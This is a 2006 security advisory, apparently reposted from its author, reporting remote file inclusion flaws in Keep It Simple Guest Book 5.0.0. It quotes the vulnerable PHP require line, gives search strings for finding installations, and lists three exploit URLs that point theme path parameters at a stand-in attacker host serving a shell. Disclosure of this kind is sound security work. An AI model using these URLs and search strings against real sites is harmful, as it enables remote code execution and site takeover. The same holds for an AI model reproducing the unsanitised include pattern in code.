SecurityvulnsSECURITYVULNS:DOC:15470Multiple Remote Vulnerabilities in KISGB
###########################################################################
Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
Author: 0o_zeus_o0 ( Arturo Z. )
Contact: [email protected]
Website: www.diosdelared.com
Date: 22/12/06
Risk: critical
Vendor Url: http://sourceforge.net/projects/kisgb,
Affected Software: Keep It Simple Guest Book
search: inurl:kisgb , intitle:KISGB
#Info:
##################################################################
#Bug is risky by since it is possible to be included I cosay malisioso
#that allows to see or to modify the archives
#code:
#if (isset($default_path_for_themes))
require("$default_path_for_themes/$theme");
#else require("$path_to_themes/$theme");
##################################################################
#http://site/path/gbpath/authenticate.php?path_to_themes=
http://shellsite.com/php.gif?
#http://site/path/gbpath/admin.php?default_path_for_themes=
http://shellsite.com/php.gif?
#http://site/path/gbpath/upconfig.php?default_path_for_themes=
http://shellsite.com/php.gif?
##################################################################
#VULNERABLE VERSIONS
##################################################################
5.0.0
##################################################################
#Contact information
#0o_zeus_o0
#[email protected]
#www.diosdelared.com
##################################################################
#greetz: S.S.M, sams, a mi beba
#Original Advisory: http://diosdelared.com/15.txt
##################################################################